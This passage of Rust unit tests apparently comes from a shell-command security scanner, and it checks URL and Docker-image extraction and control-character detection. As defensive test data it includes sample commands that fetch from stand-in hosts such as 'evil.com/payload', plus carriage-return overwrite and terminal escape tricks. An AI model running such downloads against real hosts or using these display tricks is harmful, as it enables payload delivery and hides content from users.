1289 #[test]
1290 fn test_command_wrapper_preserves_tirith_run_sink_context() {
1291 let urls = extract_urls("command tirith run http://example.com", ShellType::Posix);
1292 assert!(
1293 urls.iter()
1294 .any(|u| u.raw == "http://example.com" && u.in_sink_context),
1295 "command wrapper should preserve tirith run sink context"
1296 );
1297 }
1298
1299 #[test]
1300 fn test_time_wrapper_preserves_tirith_run_sink_context() {
1301 let urls = extract_urls("time tirith run http://example.com", ShellType::Posix);
1302 assert!(
1303 urls.iter()
1304 .any(|u| u.raw == "http://example.com" && u.in_sink_context),
1305 "time wrapper should preserve tirith run sink context"
1306 );
1307 }
1308
1309 #[test]
1310 fn test_strip_quotes_single_char() {
1311 assert_eq!(strip_quotes("\""), "\"");
1312 assert_eq!(strip_quotes("'"), "'");
1313 }
1314
1315 #[test]
1316 fn test_strip_quotes_empty() {
1317 assert_eq!(strip_quotes(""), "");
1318 }
1319
1320 #[test]
1321 fn test_scan_bytes_bel_vt_del() {
1322 let input = b"hello\x07world";
1324 let result = scan_bytes(input);
1325 assert!(result.has_control_chars);
1326
1327 let input = b"hello\x0Bworld";
1329 let result = scan_bytes(input);
1330 assert!(result.has_control_chars);
1331
1332 let input = b"hello\x0Cworld";
1334 let result = scan_bytes(input);
1335 assert!(result.has_control_chars);
1336
1337 let input = b"hello\x7Fworld";
1339 let result = scan_bytes(input);
1340 assert!(result.has_control_chars);
1341 }
1342
1343 #[test]
1344 fn test_scan_bytes_osc_apc_dcs() {
1345 let input = b"hello\x1b]0;title\x07world";
1347 let result = scan_bytes(input);
1348 assert!(result.has_ansi_escapes);
1349
1350 let input = b"hello\x1b_dataworld";
1352 let result = scan_bytes(input);
1353 assert!(result.has_ansi_escapes);
1354
1355 let input = b"hello\x1bPdataworld";
1357 let result = scan_bytes(input);
1358 assert!(result.has_ansi_escapes);
1359 }
1360
1361 #[test]
1362 fn test_schemeless_long_tld() {
1363 assert!(looks_like_schemeless_host("example.academy"));
1364 assert!(looks_like_schemeless_host("example.photography"));
1365 }
1366
1367 #[test]
1368 fn test_segment_index_correct() {
1369 let urls = extract_urls("curl https://a.com | wget https://b.com", ShellType::Posix);
1370 for url in &urls {
1372 assert!(url.segment_index <= 1);
1374 }
1375 }
1376
1377 #[test]
1378 fn test_docker_build_context_not_image() {
1379 let urls = extract_urls("docker build .", ShellType::Posix);
1380 let docker_urls: Vec<_> = urls
1381 .iter()
1382 .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
1383 .collect();
1384 assert_eq!(
1385 docker_urls.len(),
1386 0,
1387 "build context '.' should not be treated as image"
1388 );
1389 }
1390
1391 #[test]
1392 fn test_docker_image_subcmd() {
1393 let urls = extract_urls("docker image pull nginx", ShellType::Posix);
1394 let docker_urls: Vec<_> = urls
1395 .iter()
1396 .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
1397 .collect();
1398 assert_eq!(docker_urls.len(), 1);
1399 }
1400
1401 #[test]
1402 fn test_docker_run_image_after_double_dash() {
1403 let urls = extract_urls(
1404 "docker run --rm -- evil.registry/ns/img:1",
1405 ShellType::Posix,
1406 );
1407 let docker_urls: Vec<_> = urls
1408 .iter()
1409 .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
1410 .collect();
1411 assert_eq!(docker_urls.len(), 1);
1412 assert_eq!(docker_urls[0].raw, "evil.registry/ns/img:1");
1413 }
1414
1415 #[test]
1420 fn test_tier1_module_boundary_enforcement() {
1421 let ids = tier1_generated::EXTRACTOR_IDS;
1423 assert!(!ids.is_empty(), "EXTRACTOR_IDS must not be empty");
1424 let exec_count = tier1_generated::TIER1_EXEC_FRAGMENT_COUNT;
1426 let paste_count = tier1_generated::TIER1_PASTE_FRAGMENT_COUNT;
1427 assert!(exec_count > 0, "Must have exec fragments");
1428 assert!(
1429 paste_count >= exec_count,
1430 "Paste fragments must be superset of exec fragments"
1431 );
1432 Regex::new(tier1_generated::TIER1_EXEC_PATTERN)
1434 .expect("Generated exec pattern must be valid regex");
1435 Regex::new(tier1_generated::TIER1_PASTE_PATTERN)
1436 .expect("Generated paste pattern must be valid regex");
1437 }
1438
1439 #[test]
1442 fn test_scan_bytes_trailing_cr_not_flagged() {
1443 let result = scan_bytes(b"/path\r");
1444 assert!(
1445 !result.has_control_chars,
1446 "trailing \\r should not be flagged"
1447 );
1448 }
1449
1450 #[test]
1451 fn test_scan_bytes_trailing_crlf_not_flagged() {
1452 let result = scan_bytes(b"/path\r\n");
1453 assert!(
1454 !result.has_control_chars,
1455 "trailing \\r\\n should not be flagged"
1456 );
1457 }
1458
1459 #[test]
1460 fn test_scan_bytes_windows_multiline_not_flagged() {
1461 let result = scan_bytes(b"line1\r\nline2\r\n");
1462 assert!(
1463 !result.has_control_chars,
1464 "Windows \\r\\n line endings should not be flagged"
1465 );
1466 }
1467
1468 #[test]
1469 fn test_scan_bytes_embedded_cr_still_flagged() {
1470 let result = scan_bytes(b"safe\rmalicious");
1471 assert!(
1472 result.has_control_chars,
1473 "embedded \\r before non-\\n should be flagged"
1474 );
1475 }
1476
1477 #[test]
1478 fn test_scan_bytes_mixed_crlf_and_attack_cr() {
1479 let result = scan_bytes(b"line1\r\nfake\roverwrite\r\n");
1480 assert!(
1481 result.has_control_chars,
1482 "attack \\r mixed with \\r\\n should be flagged"
1483 );
1484 }
1485
1486 #[test]
1487 fn test_scan_bytes_only_cr() {
1488 let result = scan_bytes(b"\r");
1489 assert!(
1490 !result.has_control_chars,
1491 "lone trailing \\r should not be flagged"
1492 );
1493 }
1494
1495 #[test]
1496 fn test_schemeless_skip_curl_output_flag() {
1497 let urls = extract_urls("curl -o lenna.png https://example.com", ShellType::Posix);
1498 let schemeless: Vec<_> = urls
1500 .iter()
1501 .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1502 .collect();
1503 assert!(
1504 schemeless.is_empty(),
1505 "lenna.png should not be detected as schemeless URL"
1506 );
1507 }
1508
1509 #[test]
1510 fn test_schemeless_skip_curl_output_combined() {
1511 let urls = extract_urls("curl -olenna.png https://example.com", ShellType::Posix);
1512 let schemeless: Vec<_> = urls
1513 .iter()
1514 .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1515 .collect();
1516 assert!(
1517 schemeless.is_empty(),
1518 "-olenna.png should not be detected as schemeless URL"
1519 );
1520 }
1521
1522 #[test]
1523 fn test_schemeless_skip_wget_output_flag() {
1524 let urls = extract_urls("wget -O output.html https://example.com", ShellType::Posix);
1525 let schemeless: Vec<_> = urls
1526 .iter()
1527 .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1528 .collect();
1529 assert!(
1530 schemeless.is_empty(),
1531 "output.html should not be detected as schemeless URL"
1532 );
1533 }
1534
1535 #[test]
1536 fn test_schemeless_skip_wget_combined() {
1537 let urls = extract_urls("wget -Ooutput.html https://example.com", ShellType::Posix);
1538 let schemeless: Vec<_> = urls
1539 .iter()
1540 .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1541 .collect();
1542 assert!(
1543 schemeless.is_empty(),
1544 "-Ooutput.html should not be detected as schemeless URL"
1545 );
1546 }
1547
1548 #[test]
1549 fn test_schemeless_real_domain_still_detected() {
1550 let urls = extract_urls("curl evil.com/payload", ShellType::Posix);
1551 let schemeless: Vec<_> = urls
1552 .iter()
1553 .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1554 .collect();
1555 assert!(
1556 !schemeless.is_empty(),
1557 "evil.com/payload should be detected as schemeless URL"
1558 );
1559 }
1560
1561 #[test]
1562 fn test_schemeless_user_at_host_detected_in_sink_context() {
1563 let urls = extract_urls("curl user@bit.ly", ShellType::Posix);
1564 let schemeless: Vec<_> = urls
1565 .iter()
1566 .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1567 .collect();
1568 assert_eq!(schemeless.len(), 1);
1569 assert_eq!(schemeless[0].raw, "user@bit.ly");
1570 }
1571
1572 #[test]
1573 fn test_scp_user_at_host_not_treated_as_schemeless_url() {
1574 let urls = extract_urls("scp user@server.com file.txt", ShellType::Posix);
1575 let schemeless: Vec<_> = urls
1576 .iter()
1577 .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1578 .collect();
1579 assert!(schemeless.is_empty());
1580 }
1581
1582 #[test]
1583 fn test_schemeless_png_no_slash_is_file() {
1584 assert!(!looks_like_schemeless_host("lenna.png"));
1585 }
1586
1587 #[test]
1588 fn test_schemeless_tld_overlap_with_path_is_domain() {
1589 assert!(looks_like_schemeless_host("evil.zip/payload"));
1592 assert!(looks_like_schemeless_host("evil.sh/payload"));
1593 }
1594
1595 #[test]
1596 fn test_schemeless_tld_overlap_without_path_is_file() {
1597 assert!(!looks_like_schemeless_host("lenna.zip"));
1599 assert!(!looks_like_schemeless_host("script.sh"));
1600 }
1601
1602 #[test]
1603 fn test_schemeless_tld_overlap_sink_context_detected() {
1604 let urls = extract_urls("curl evil.zip/payload", ShellType::Posix);
1606 let schemeless: Vec<_> = urls
1607 .iter()
1608 .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1609 .collect();
1610 assert!(
1611 !schemeless.is_empty(),
1612 "evil.zip/payload should be detected as schemeless URL in sink context"
1613 );
1614 }
1615}